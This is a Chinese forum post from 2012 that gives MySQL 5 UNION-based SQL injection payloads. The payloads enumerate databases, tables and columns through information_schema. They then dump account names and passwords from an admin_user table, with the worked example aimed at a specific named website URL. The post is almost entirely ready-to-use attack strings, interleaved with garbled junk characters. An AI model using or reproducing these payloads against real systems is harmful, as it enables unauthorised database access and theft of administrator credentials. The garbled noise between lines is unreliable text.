查库
# z9 W1 e) w5 y9 y
% D* j) N0 J2 L& r tid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
. a$ H3 u, P1 T* l* k
0 P! |$ C% U: ^' ~& b5 u查表
0 \: t% g( v7 _4 e U' p' o/ Y) l+ o4 v9 w7 K+ O
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
4 z: [' w/ v( a! m$ @7 J1 h) ~9 r$ D
- X% D9 _1 X* G3 ^& o( p+ q查段
; r4 T8 z% d" Z7 ?9 ~# M4 p4 H; e. ^. s X3 d: H: ]2 u- g4 O! Z
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
9 a- q* \: G" b2 M+ L L' E1 s7 i9 ]% `) R; l, @& j; D1 ]
+ [# v; ]" _& cmysql5高级注入方法暴表
" i b1 d9 @" t# q" [
2 g' s# F6 m4 i: Q例子如下:
+ t% A( u; K$ z. G
; H* w5 R3 E) K' z2 q1.爆表6 {5 g2 s, I8 Q$ H& Z: V
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
3 P% F* J- y4 b! _7 X这样爆到第4个时出现了admin_user表。, _ v: L! X- P H3 `
3 U: J$ A8 [ S7 p' R, Z, t
2.暴字段9 c3 K- ~6 I" K
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*$ P0 J, T& A, w: O R) r) f6 K
/ o2 m# ~8 R8 v5 m/ l0 Z
9 h8 M1 W7 _/ h# H: s6 n3.爆密码# a. ?( w/ B4 K! J, ?
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* " T! ^6 T5 W& K% B6 a( v6 L
+ v1 q" d4 j# D$ B( X2 C5 l6 t! \8 i
. H! S& |+ n' G8 f7 Z' a$ k |
发表于 2012-9-13 16:29:37
收藏
支持
反对